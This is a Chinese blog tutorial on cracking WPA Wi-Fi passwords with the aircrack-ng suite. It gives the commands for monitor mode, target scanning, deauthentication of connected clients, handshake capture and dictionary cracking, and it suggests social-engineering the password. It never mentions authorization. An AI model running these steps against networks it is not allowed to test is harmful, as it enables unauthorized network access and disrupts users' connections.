无线安全审计工具aircrack-ng详解
来源:互联网 发布:陆逊 知乎 编辑:程序博客网 时间:2024/05/22 07:06
无线渗透试的工具有很多,在windows下和Linux下的工具各有千秋,因在windows下的工具基本都是图形界面,操作起来比较直观易懂,在此就不再做过多介绍,本方重点介绍在linux下的一种通用的方法。
首先讲一下现行无线渗透试的一般方法和原理。
目前无线渗透试的两种方法:1、抓握手包,跑包。2、通过WPS进行跑pin码
当然第2种方法是要求路由器开启了wps功能。并且要求路由器没有设置pin防护,其它的方法如路由器漏洞等不在此讨论范围内。
WEP方式认证的路由器已经很少了,而且这种认证方式不但非常不安全且绝对可破,不再讲解,本文只讲WPA认证方式的渗透方法。
其实最有效的取得密码的方法是直接编个理由过去问!(社工)
原理:抓到的包中有密码的密文,做暴力跑包即可。
工具:aircrack-ng工具包(kali内置),一个支持监听模式的无线网卡。
第一步:开启无线网卡的监听模式。
这一步首先你的系统要识别你的无线网卡。
使用ifconfig -a命令查看你的网卡叫什么名字。比如叫wlan0
使用ifconfig wlan0 up激活你的无线网卡。
使用airmon-ng check kill结束系统中可能的干扰进程。
使用airmon-ng start wlan0开启你网卡的监听模式。并记住监听模式的名字。
第二步:监听周围wifi状态,选择要破解的无线路由器
使用airodump-ng wlan0mon开始监听
第三步:针对要要破解的wifi重新开启一个监听记录,发送断开命令,等待客户端重新连接时监听密码包。
airodump-ng -w 文件名(自己起一个名,用来保存监听到的数据) -c 监听频道 wlan0mon
打开另一个shell使用
aireplay-ng -0 1 -a 路由器的MAC地址 -c 客户端的MAC地址 wlan0mon
强制断开连 接到路由器的设备,以便在它再次连接时捕获它的认证包。
看看原来的airodump-ng的窗口是否在右上解提示有WPA handshake监听到
第四步:跑包测试加密的无线密码
aircrack-ng -w 准备好的密码字典 捕获到的数据包
阅读全文
0 0
- 无线安全审计工具aircrack-ng详解
- 无线破解攻击工具Aircrack-ng使用详解
- 无线破解攻击工具Aircrack-ng使用详解
- 无线破解攻击工具Aircrack-ng使用详解
- 无线wifi破解工具之Aircrack-ng
- 开源项目之无线密码破解工具 Aircrack-ng
- 【无线攻防】使用aircrack-ng工具破解wifi密码
- Kali-WIFI攻防(二)----无线网络分析工具Aircrack-ng
- 【原创】无线破解Aircrack-ng套件详解--airmon-ng与airodump-ng
- 无线安全及Aircrack-ng for Windows破解无线wep,wap密码
- 无线安全及Aircrack-ng for Windows破解无线wep,wap密码 .
- aircrack-ng的安装详解
- ubuntu破解无线路由器密码aircrack-ng
- Ubuntu无线密码破解--aircrack-ng
- Ubuntu 无线密码破解利器aircrack-ng
- 无线渗透 aircrack-ng的使用
- aircrack-ng暴力破解无线密码攻略
- 无线安全及Aircrack-ng for Windows破解无线wep,wap密码(附图)/下载 教程 使用 用法 破解
- vector 清空操作
- 南阳理工14 -会场安排问题
- Android 功耗分析之wakelock
- 程序设计思维
- c++ 统计文本词频
- 无线安全审计工具aircrack-ng详解
- PAT乙级 1061. 判断题(15)
- jeeSite分页
- if语句的套路:
- JavaScript的程序设计思维与选择结构
- 欢迎使用CSDN-markdown编辑器
- linux下jdk版本切换
- 程序设计思维
- HDU5769后缀数组,高度数组模板